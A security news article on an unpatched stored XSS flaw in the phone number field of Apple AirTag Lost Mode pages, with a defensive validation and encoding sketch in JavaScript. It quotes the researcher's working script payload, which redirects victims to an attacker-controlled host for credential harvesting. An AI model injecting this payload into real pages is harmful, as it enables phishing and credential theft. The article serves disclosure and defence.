Apple AirTag Zero-Day – Now Weaponizes Trackers!

Apple’s personal item-tracker devices can be used to deliver malware, slurp credentials, steal tokens & more thanks to XSS.

An unpatched stored cross-site scripting (XSS) bug in Apple’s AirTag “Lost Mode” could open users up to many web-based attacks, including credential-harvesting, click-jacking, malware delivery, token theft & more.

Persistent XSS

That’s according to Bobby Rauch, an independent security researcher who explained that it’s possible to use the zero-day to fully weaponize an AirTag, with the ability to attack random strangers (or specific targets) should they interact with it.

Stored XSS, also known as persistent XSS, occurs when a malicious script is injected directly into a vulnerable web application. An attack then only requires that a victim visit a compromised web page.

How AirTags work: Apple’s AirTags are personal tracking devices that can be attached to keys, backpacks & other items. If an AirTagged item is lost & nearby, a user can “ping” the AirTag, which will emit a sound & allow it to be tracked down.

Bluetooth Signal

If it’s further away (left behind in a restaurant, etc.), the AirTag sends out a secure Bluetooth signal that can be detected by nearby devices in Apple’s Find My network (which has had its own issues in the past). These devices send the location of the AirTag to iCloud & the user can open the Find My app & see the lost item on a map.

The Lost Mode function goes hand in hand with this longer-range tracking. If an AirTag doesn’t show up in the Find My app, a user can mark the AirTag as missing & will get an alert if it’s later picked up by the Find My network.

Lost Mode

However, the problematic part of Lost Mode is a different feature: if a stranger finds an AirTag in Lost Mode & scans it via near-field communication (NFC), it generates a unique https://found.apple.com page, which contains its serial number, phone number & a personal message for anyone discovering it. The idea is to let people “turn in” missing items to their rightful owners.

The issue, according to Rauch, is that these pages don’t have protection for stored XSS – so, an attacker can inject a malicious payload into the AirTag using the Lost Mode phone number field.

In one attack scenario, cyber-criminals can use XSS code to redirect victims to the attacker’s fake iCloud page, which has a keylogger installed to capture their credentials.

Credential-Hijacking

“A victim will believe they are being asked to sign into iCloud so they can get in contact with the owner of the AirTag, when in fact, the attacker has redirected them to a credential-hijacking page,” Rauch stated in a Tues. posting.

“Since AirTags were recently released, most users would be unaware that accessing the https://found.apple.com page doesn’t require authentication at all.”

He added, “An attacker can create weaponised AirTags & leave them around, victimising innocent people who are simply trying to help a person find their lost AirTag.”

Malicious Payload

Rauch provided an example malicious payload to be entered into the phone number field: “<script>window.location='https://10.0.1.137:8000/indexer.html';var a = '';</script>”. He also noted that AirTags could be weaponized to carry out all sorts of attacks.
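For defenders, the missing protection comes down to two checks on the phone number field: allow-list validation when the value is stored, and HTML encoding when it is rendered. The sketch below is an added example, not Apple’s code or Rauch’s; the function names, record shape and sample serial are hypothetical, and the minimum digit count is an assumption.

```javascript
// Added example: hypothetical "found item" page logic, not Apple's code.
// Defence 1: allow-list validation when the phone number is stored.
// Defence 2: HTML output encoding when any stored field is rendered.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can change the HTML parsing context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Accept only characters a phone number can contain, then check digit count
// (E.164 allows at most 15 digits; the minimum of 7 is an assumption).
function normalizePhone(input) {
  if (typeof input !== 'string') return null;
  const trimmed = input.trim();
  if (!/^\+?[0-9 ().-]{7,25}$/.test(trimmed)) return null;
  const digits = trimmed.replace(/\D/g, '');
  if (digits.length < 7 || digits.length > 15) return null;
  return (trimmed.startsWith('+') ? '+' : '') + digits;
}

// Store path: reject anything that is not a phone number.
function storeLostModeContact(record, phoneInput) {
  const phone = normalizePhone(phoneInput);
  if (phone === null) return { ok: false, error: 'invalid phone number' };
  return { ok: true, record: { ...record, phone } };
}

// Render path: encode on output even though stored values were validated,
// so legacy or unvalidated rows still cannot inject markup.
function renderFoundPage(record) {
  return '<p>Serial: ' + escapeHtml(record.serial) + '</p>\n' +
         '<p>Phone: ' + escapeHtml(record.phone) + '</p>\n' +
         '<p>Message: ' + escapeHtml(record.message) + '</p>';
}

// Constructed sample input: the payload quoted in the article.
const payload = "<script>window.location='https://10.0.1.137:8000/indexer.html';var a = '';</script>";
const rejected = storeLostModeContact({ serial: 'SAMPLE-0001', message: 'Please call' }, payload);
// A row stored before validation existed (constructed) is rendered inert.
const legacyRow = { serial: 'SAMPLE-0001', phone: payload, message: 'Please call' };
console.log(rejected.ok, renderFoundPage(legacyRow).includes('<script'));
```

Either check alone stops the quoted payload; keeping both means a gap in one path does not expose the page.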

“This is only one example of the dangers of stored XSS,” he wrote. “There are countless ways an attacker could victimise an end user who discovers a lost AirTag…The https://found.apple.com link can also be used as a phishing link, & shared via a desktop/laptop, without the need for a mobile device to scan the AirTag.

Injection Attacks

“Further injection attacks could occur through the Find My App, which is used to scan 3rd-party devices that support ‘Lost Mode’ as part of Apple’s Find My network.”

The bug has yet to be patched, although Rauch told security journalist Brian Krebs that he reported it to Apple on June 20. Last week, the company told him that it was planning to patch “in an upcoming update.”

Without a timeline for a fix or any response to his multiple questions about credit & acknowledgement, Rauch told Krebs he decided to go public.
